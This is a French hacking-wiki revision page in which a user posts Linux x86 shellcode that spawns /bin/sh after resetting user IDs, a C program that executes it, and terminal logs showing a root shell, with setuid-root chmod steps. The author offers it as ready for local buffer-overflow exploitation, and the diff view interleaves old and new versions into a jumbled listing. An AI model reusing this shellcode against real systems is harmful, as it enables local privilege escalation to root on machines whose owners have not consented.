« Hiteck » : différence entre les versions

De HackBBS
Aller à la navigation Aller à la recherche
Blackdevil (discussion | contributions)
Aucun résumé des modifications
Blackdevil (discussion | contributions)
Aucun résumé des modifications
 
(27 versions intermédiaires par le même utilisateur non affichées)
Ligne 1 : Ligne 1 :
<h2>Shellcoding</h2>
<p>


<p>
<b><u>Mercredi 23 juin 2010</u></b>
<b><u>Vendredi 18 juin 2010 :</u></b><br />
 
Enfin un vrai shellcode qui ouvre un shell c'est magnifique tout sa :-D<br /><br />
<br /><br />


  #include <stdio.h><br />
Voila mon nouveau exploit shellcode prêt à être utilisé pour une exploitation de buffer overflow en local :-D
<br /><br />
hiteck@hiteck:~/Bureau/Programmation$ cat exploit.c<br />
  #include <stdio.h><br /><br />


char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";<br />
char shellcode[] = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";<br /><br />


int main(void)<br />
int main(void)<br />
{<br />
{<br />
(*(void(*)()) shellcode)();<br />  
printf("\n[+] Exploit shellcode remote");<br />
}<br /><br />
printf("\n[+] Codé par hit3ck");<br />
Encore un petit exemple :D<br />
fprintf(stdout,"\n[+] Taille: %d\n",strlen(shellcode));<br />
root@hiteck:/home/hiteck/Bureau/exploits# chown root.root shell1<br />
(*(void(*)()) shellcode)();<br />
root@hiteck:/home/hiteck/Bureau/exploits# chmod +s shell1<br />
}<br />
root@hiteck:/home/hiteck/Bureau/exploits# ls -l shell1<br />
hiteck@hiteck:~/Bureau/Programmation$ ./exploit<br /><br />
-rwsr-sr-x 1 root root 8317 2010-06-17 23:47 shell1<br />
 
root@hiteck:/home/hiteck/Bureau/exploits# exit<br />
[+] Exploit shellcode remote<br />
exit<br />
[+] Codé par hit3ck<br />
hiteck@hiteck:~/Bureau/exploits$ ./shell1<br />
[+] Taille: 33<br />
  $# whoami<br />
  # whoami<br />
root<br />
root<br />
  $# echo "Local shellcode remote :-D"<br />
  # echo "Local exploit shellcode remote :-D"<br />
Local shellcode remote :-D<br />
Local exploit shellcode remote :-D<br />
  $# exit<br />
  # exit<br />
hiteck@hiteck:~/Bureau/exploits$<br />
hiteck@hiteck:~/Bureau/Programmation$ <br /><br />
 
Attention le teste de l'exploit shellcode a eu les privilèges root au maximum, donc le programme a exploiter doit donc avoir less privilège root sinon c'est pas la peine.<br /><br />
A la prochaine :-D
</p>
</p>

Dernière version du 11 juin 2014 à 18:57

Mercredi 23 juin 2010

Voila mon nouveau exploit shellcode prêt à être utilisé pour une exploitation de buffer overflow en local :-D

hiteck@hiteck:~/Bureau/Programmation$ cat exploit.c
#include <stdio.h>

char shellcode[] = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(void)
{
printf("\n[+] Exploit shellcode remote");
printf("\n[+] Codé par hit3ck");
fprintf(stdout,"\n[+] Taille: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}
hiteck@hiteck:~/Bureau/Programmation$ ./exploit

[+] Exploit shellcode remote
[+] Codé par hit3ck
[+] Taille: 33
# whoami
root
# echo "Local exploit shellcode remote :-D"
Local exploit shellcode remote :-D
# exit
hiteck@hiteck:~/Bureau/Programmation$

Attention le teste de l'exploit shellcode a eu les privilèges root au maximum, donc le programme a exploiter doit donc avoir less privilège root sinon c'est pas la peine.